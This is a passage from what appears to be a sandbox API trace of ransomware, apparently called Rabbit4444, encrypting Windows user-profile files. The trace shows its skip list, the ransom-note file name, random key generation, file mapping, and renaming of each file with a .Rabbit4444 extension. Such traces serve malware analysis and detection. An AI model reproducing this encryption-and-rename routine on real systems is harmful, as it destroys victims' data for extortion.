dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0060.433] CryptAcquireContextW (in: phProv=0x11cbbf8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x11cbbf8*=0x101af0) returned 1 [0060.433] CryptGenRandom (in: hProv=0x101af0, dwLen=0x80, pbBuffer=0x11cbc14 | out: pbBuffer=0x11cbc14) returned 1 [0060.433] CryptReleaseContext (hProv=0x101af0, dwFlags=0x0) returned 1 [0060.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0060.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0060.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0060.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0060.434] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15174446132) returned 1 [0060.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0060.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0060.434] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0060.438] CloseHandle (hObject=0x2a0) returned 1 [0060.439] CloseHandle (hObject=0x260) returned 1 [0060.439] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.Rabbit4444") returned 120 [0060.439] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000001.regtrans-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.440] InterlockedExchangeAdd (in: Addend=0xff820, Value=524288 | out: Addend=0xff820) returned 118784 [0060.440] InterlockedExchangeAdd (in: Addend=0xff82c, Value=15 | out: Addend=0xff82c) returned 29 [0060.440] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de71fdf, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0x855d0141, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootmgr") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="pagefile.sys") returned -1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="ids.txt") returned 1 [0060.440] lstrcmpiW (lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0060.440] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms" [0060.440] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x22) returned 1 [0060.441] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x6) returned 1 [0060.441] lstrlenW (lpString="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0060.441] lstrlenW (lpString="Rabbit4444") returned 10 [0060.441] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0060.441] lstrlenW (lpString=".dll") returned 4 [0060.441] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0060.441] lstrlenW (lpString=".lnk") returned 4 [0060.441] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0060.441] lstrlenW (lpString=".ini") returned 4 [0060.441] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0060.442] lstrlenW (lpString=".sys") returned 4 [0060.442] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0060.442] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.442] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.442] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15175258828) returned 1 [0060.442] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=524288) returned 1 [0060.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0060.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0060.442] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x280 [0060.443] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0060.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0060.457] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0060.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.457] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.458] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15176829319) returned 1 [0060.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0060.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0060.458] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0060.462] CloseHandle (hObject=0x280) returned 1 [0060.462] CloseHandle (hObject=0x260) returned 1 [0060.462] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.Rabbit4444") returned 120 [0060.462] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.463] InterlockedExchangeAdd (in: Addend=0xff820, Value=524288 | out: Addend=0xff820) returned 643072 [0060.463] InterlockedExchangeAdd (in: Addend=0xff82c, Value=15 | out: Addend=0xff82c) returned 44 [0060.463] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="Rabbit4444.exe") returned -1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2=".") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="..") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="windows") returned -1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="bootmgr") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="pagefile.sys") returned -1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="boot") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="ids.txt") returned 1 [0060.463] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", lpString2="NTUSER.DAT") returned 1 [0060.463] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" [0060.463] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x22) returned 1 [0060.464] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", dwFileAttributes=0x6) returned 1 [0060.464] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf") returned 55 [0060.464] lstrlenW (lpString="Rabbit4444") returned 10 [0060.464] lstrcmpiW (lpString1="9b}.TM.blf", lpString2="Rabbit4444") returned -1 [0060.464] lstrlenW (lpString=".dll") returned 4 [0060.464] lstrcmpiW (lpString1=".blf", lpString2=".dll") returned -1 [0060.464] lstrlenW (lpString=".lnk") returned 4 [0060.465] lstrcmpiW (lpString1=".blf", lpString2=".lnk") returned -1 [0060.465] lstrlenW (lpString=".ini") returned 4 [0060.465] lstrcmpiW (lpString1=".blf", lpString2=".ini") returned -1 [0060.465] lstrlenW (lpString=".sys") returned 4 [0060.465] lstrcmpiW (lpString1=".blf", lpString2=".sys") returned -1 [0060.465] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.465] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.465] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15177566568) returned 1 [0060.465] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=65536) returned 1 [0060.465] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0060.465] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0060.465] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x280 [0060.466] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x80000 [0060.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0060.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0060.470] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15178113416) returned 1 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0060.470] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0060.471] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0060.471] CloseHandle (hObject=0x280) returned 1 [0060.471] CloseHandle (hObject=0x260) returned 1 [0060.471] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.Rabbit4444") returned 83 [0060.471] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tm.blf.rabbit4444"), dwFlags=0x1) returned 1 [0060.472] InterlockedExchangeAdd (in: Addend=0xff820, Value=65536 | out: Addend=0xff820) returned 1167360 [0060.472] InterlockedExchangeAdd (in: Addend=0xff82c, Value=5 | out: Addend=0xff82c) returned 59 [0060.472] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~3.REG")) returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="windows") returned -1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootmgr") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="pagefile.sys") returned -1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="ids.txt") returned 1 [0060.472] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0060.472] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" [0060.472] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x22) returned 1 [0060.473] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x6) returned 1 [0060.473] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0060.473] lstrlenW (lpString="Rabbit4444") returned 10 [0060.473] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0060.473] lstrlenW (lpString=".dll") returned 4 [0060.473] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0060.473] lstrlenW (lpString=".lnk") returned 4 [0060.473] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0060.473] lstrlenW (lpString=".ini") returned 4 [0060.473] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0060.473] lstrlenW (lpString=".sys") returned 4 [0060.473] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0060.473] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.473] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.473] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15178409628) returned 1 [0060.473] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=524288) returned 1 [0060.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0060.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0060.474] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x280 [0060.475] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0060.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0060.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0060.489] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0060.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0060.489] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15179966292) returned 1 [0060.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0060.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0060.489] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0060.494] CloseHandle (hObject=0x280) returned 1 [0060.494] CloseHandle (hObject=0x260) returned 1 [0060.494] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.Rabbit4444") returned 120 [0060.494] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.495] InterlockedExchangeAdd (in: Addend=0xff820, Value=524288 | out: Addend=0xff820) returned 1232896 [0060.495] InterlockedExchangeAdd (in: Addend=0xff82c, Value=15 | out: Addend=0xff82c) returned 64 [0060.495] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b716935, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b716935, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~4.REG")) returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.495] lstrcmpiW 